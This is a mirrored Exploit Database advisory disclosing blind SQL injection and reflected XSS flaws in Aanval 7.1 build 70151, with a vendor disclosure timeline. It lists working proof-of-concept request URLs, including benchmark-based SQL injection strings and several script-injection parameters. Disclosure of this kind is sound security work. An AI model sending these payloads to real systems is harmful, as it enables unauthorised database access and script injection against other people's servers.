Aanval 7.1 build 70151 – Multiple Vulnerabilities

• Exploit Database
• 38 阅读

• 作者： xistence
  日期： 2013-10-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/28723/

• -----------
  Author:
  -----------
  
  xistence < xistence[at]0x90[.]nl >
  
  -------------------------
  Affected products:
  -------------------------
  
  Aanval 7.1 build 70151
  
  -------------------------
  Affected vendors:
  -------------------------
  
  Aanval
  http://www.aanval.com/
  https://www.aanval.com/download/pickup
  
  -------------------------
  Product description:
  -------------------------
  
  Aanval is the industry's most comprehensive Snort and Syslog Intrusion
  Detection, Correlation,
  and Threat Management console on the market. Aanval supports both Snort and
  Suricata,
  as well as virtually any Syslog data source, and is designed specifically
  to scale from
  small-single sensor installations to global enterprise deployments.
  
  Aanval's primary function is to correlate data from multiple sources, bring
  together billions of events,
  and present users with a holistic view of false-positive free, network
  security situational awareness.
  
  ----------
  Details:
  ----------
  
  Aanval 7.1 build 70151 is prone to multiple vulnerabilities. Below are the
  details.
  
  [ 0x01 - Blind SQL Injection ]
  
  The "id" and "query" parameters are vulnerable to blind SQL injection. The
  proof of concept below does a sha1 benchmark on the value "1". This will
  take a couple of seconds to process in most situations and thus shows that
  the injection works.
  http://
  <IP>/aanval/?op=prv_myReports&id=2'%20and%20benchmark(20000000%2csha1(1))--%20
  http://
  <IP>/aanval/?op=prv_eventSearch&query=%20report:'%2bbenchmark(20000000%2csha1(1))%2b'
  
  
  [ 0x02 - Reflected XSS ]
  
  The following requests are vulnerable to "Cross Site Scripting" and will
  show a pop-up with the word "XSS".
  
  http://<IP>/aanval/?op=prv_eventSearch&dip=<script>alert('XSS')</script>
  http://<IP>/aanval/?op=prv_eventSearch&dport=%0Aalert('XSS')//
  http://<IP>/aanval/?num=<script>alert('XSS')</script>
  http://<IP>/aanval/?op=prv_eventSearch&protocol=%0Aalert('XSS')//
  http://
  <IP>/aanval/?op=prv_eventSearch&query=%20report:31337%0aalert('XSS')//
  http://<IP>/aanval/?op=prv_eventSearch&risk=%0Aalert('XSS')//
  http://<IP>/aanval/?op=prv_eventSearch&sip=<script>alert('XSS')</script>
  http://<IP>/aanval/?op=prv_eventSearch&sport=%0aalert('XSS')//
  http://<IP>/aanval/?op=prv_eventSearch&string=<script>alert('XSS')</script>
  http://
  <IP>/aanval/?op=prv_eventSearchResults&transaction="><script>alert('XSS')</script>
  
  -----------
  Solution:
  -----------
  
  No fix available, use a good WAF :)
  
  --------------
  Timeline:
  --------------
  
  2013-08-16 Provided details to Aanval support. Ticket is created.
  2013-09-19 Asked for status update.
  2013-09-26 No response yet, asked for status update again.
  2013-10-04 Still no response, public disclosure.